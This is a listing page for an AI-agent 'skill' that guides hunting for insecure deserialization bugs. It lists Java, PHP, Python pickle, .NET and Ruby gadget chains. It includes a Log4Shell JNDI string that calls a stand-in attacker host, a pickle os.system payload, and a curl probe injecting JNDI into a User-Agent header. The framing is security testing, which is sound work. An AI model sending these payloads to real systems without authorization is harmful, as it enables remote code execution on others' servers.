hunt-deserialization

Solid

Hunt Insecure Deserialization — Java gadget chains (ysoserial), PHP object injection (phpggc), Python pickle RCE, .NET BinaryFormatter, Ruby Marshal.load, JNDI/Log4Shell. RCE via deserialization is almost always Critical. Use when target runs Java, PHP serialization, Python pickle, .NET, or Ruby on Rails.

AI & Automation 1,912 stars 279 forks Updated 3 days ago NOASSERTION


Quality Score: 86/100

Stars (20%): 100
Recency (20%): 100
Frontmatter (20%): 70
Documentation (15%): 100
Issue Health (10%): 50
License (10%): 100
Description (5%): 100

Skill Content

# HUNT-DESERIALIZATION — Insecure Deserialization

## Crown Jewel Targets

Deserialization bugs are almost always Critical — they lead directly to RCE without prerequisite conditions.

**Highest-value chains:**

- **Java ysoserial gadget chains** — CommonsCollections, Spring, JNDI, Groovy gadgets → full OS command execution
- **PHP Object Injection** — `__wakeup` / `__destruct` magic methods → file write / RCE
- **Python pickle** — `pickle.loads(attacker_data)` → `__reduce__` → `os.system('id')`
- **.NET BinaryFormatter** — TypeConfuseDelegate gadget chain → RCE
- **Ruby Marshal.load** — Gem::Requirement, Gem::Installer gadgets → RCE
- **JNDI injection** — Log4Shell pattern: `${jndi:ldap://attacker/a}` → class load → RCE

---

## Attack Surface Signals

### Detection Patterns

```bash
# Java serialized objects start with AC ED 00 05 (hex) or rO0A (base64)
echo "rO0ABXQ=" | base64 -d | xxd | head -1
# shows: ac ed 00 05

# PHP serialization: O:8:"stdClass":0:{}
# Python pickle: starts with \x80\x04 (protocol 4) or \x80\x02

# Apache Shiro: rememberMe cookie present
curl -sI https://$TARGET/ | grep -i "Set-Cookie.*rememberMe"

# Log4j: test user-controlled fields for JNDI interpolation
curl -H 'User-Agent: ${jndi:dns://COLLAB_HOST/a}' https://$TARGET/
```

### Header / Cookie Signals

```
Content-Type: application/x-java-serialized-object
Cookie containing rO0= prefix (Java base64 serialized)
Cookie: rememberMe= (Apache Shiro)
Cookie: _VIEWSTATE (ASP.NET ViewState without encrypt...
```

Details

Author: elementalsouls
Repository: elementalsouls/Claude-BugHunter
Created: 1 month ago
Last Updated: 3 days ago
Language: Python
License: NOASSERTION
